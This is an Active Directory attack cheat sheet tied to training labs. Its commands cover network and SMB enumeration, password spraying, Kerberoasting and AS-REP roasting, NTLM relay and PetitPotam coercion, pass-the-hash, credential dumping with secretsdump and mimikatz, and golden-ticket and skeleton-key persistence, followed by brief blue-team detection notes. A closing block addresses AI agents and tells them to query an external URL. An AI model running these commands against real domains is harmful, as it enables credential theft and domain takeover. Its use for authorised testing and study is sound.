# Active Directory Cheat Sheet for 2025

<figure><img src="https://cdn-images-1.medium.com/max/800/0*YMlH4El_HffbE7qz.png" alt=""><figcaption></figcaption></figure>

> *Active Directory is the spine of enterprise networks — break it, and the whole body collapses.*

Welcome to your **2025-ready Active Directory (AD) cheat sheet** — a masterkey reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigs as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like **TryHackMe’s Attacking AD, Ignite, Wreath**, and **HackTheBox’s Labs** (free tier).

## Scan Network & Initial Enumeration <a href="#b68a" id="b68a"></a>

📌 Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

### **Lab Used**: *TryHackMe — Ignite (Free)*

* `nmap -sP <target_range>` — Sweep the subnet for life.
* `nmap -PN -sV --top-ports 50 --open <target_ip>` — Fingerprint the top talkers.
* `nmap -PN --script smb-vuln* -p139,445 <target_ip>` — Check SMB doors for rusty locks.
* `cme smb <target_range>` — CrackMapExec meets Samba: Discover shares, users, and more.

## Active Directory Discovery <a href="#id-9b4d" id="id-9b4d"></a>

**Real-World Feel**: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

**Lab Used**: *TryHackMe — Attacking AD*

* `nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL` — Sniff out Domain Controllers.
* `dig axfr @dns_server domain.local` — (If misconfigured) grab every DNS record.
* `enum4linux -a -u "" -p "" <target_ip>` — Anonymous recon.
* `smbmap -u "guest" -p "" -P 445 -H <target_ip>` — Test for open access.

**Try This in Wreath**: Compare anonymous SMB access vs. guest login.

## Gaining Foothold: Attacks That Work <a href="#a15e" id="a15e"></a>

**This is your beachhead.** You’re not deep yet — but you’ve got a toe in the door.

**Password Spraying**

* `cme smb -u user.txt -p password.txt <target_ip>`→ Blanket login attempts with caution.

**AS-REP Roasting**

```
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat
```

* **Demo This**: *TryHackMe — Wreath*, where one user lacks pre-auth and leaks hashes.

**LLMNR Poisoning + Relays**

```
responder -I tun0 
ntlmrelayx.py -tf targets.txt -socks -smb2support
```

**PetitPotam NTLM Coercion**

* `PetitPotam.py -d DOMAIN.LOCAL <attacker_ip> <target_ip>` — Weaponized forced auth.

## Post-Exploitation & Lateral Movement <a href="#cf2a" id="cf2a"></a>

**This is where it gets cinematic.** You’ve got creds. Now you walk the domain.

**Real-Lab Example**: *HackTheBox — Offshore (Free)* has this exact flow with SMB shares, BloodHound ops, and user hops.

**BloodHound Collection**

```
bloodhound-python -d DOMAIN -u USER -p PASS -gc DC_IP -c all
```

**Enumerate Shares**

```
cme smb <target_ip> -u user -p pass --shares
```

**Kerberoasting**

```
GetUserSPNs.py -request -dc-ip DC_IP DOMAIN/USER:PASS
```

**Pass-the-Hash / Key**

```
evil-winrm -i <ip> -u user -H <NTLM hash>

wmiexec.py -hashes :NTLM user@target
```

## Domain Dominance <a href="#de7b" id="de7b"></a>

*Endgame begins.* You now own one machine. Time to own the forest.

**Credential Dumping**

```
secretsdump.py DOMAIN/USER:PASS@DC_IP # Get that juicy NTDS.dit.
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"
```

**Golden Ticket**

```
ticketer.py -nthash <krbtgt_hash> -domain-sid <sid> -domain DOMAIN <user>
```

**Skeleton Key**

`mimikatz "privilege::debug" "misc::skeleton"` — One key to rule them all.

## Blue Team & Detection Notes <a href="#id-2f66" id="id-2f66"></a>

**Defend like a hunter.** Here’s what defenders *should* be doing.

* Monitor PowerShell logs: `Sysmon + WinLogBeat + Elastic`.
* Detect responder/LLMNR poisoning with: `Invoke-DetectResponder.ps1`
* Enable SMB signing to nullify NTLM relays.
* Set `Audit Directory Services Changes` for object manipulation.
* Rotate `krbtgt` password twice after compromise.

*TryHackMe — Security Analyst Path* offers hands-on SIEM and GPO audit labs.

## Hash Cracking Cheat Codes <a href="#id-80cb" id="id-80cb"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*aLnasR6M2fDo9SSFRIybMw.png" alt=""><figcaption></figcaption></figure>

## Bonus: Custom Tools & Power Scripts <a href="#id-1f7e" id="id-1f7e"></a>

* `PowerView.ps1` – Swiss army knife for AD enum.
* `SharpHound.exe` – Native collector for BloodHound.
* `Invoke-Kerberoast`, `Invoke-UserHunter`, `Get-GPPPassword` – Part of PowerSploit.
* `adidnsdump` – Digs through DNS for fun and creds.

## Final Note <a href="#f19c" id="f19c"></a>

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and **don’t memorize — internalize**.

> *“The more silently you move in AD, the louder your skills speak.”*


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://aenosh-rajora.gitbook.io/cyber-codex/active-directory-cheat-sheet-for-2025.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.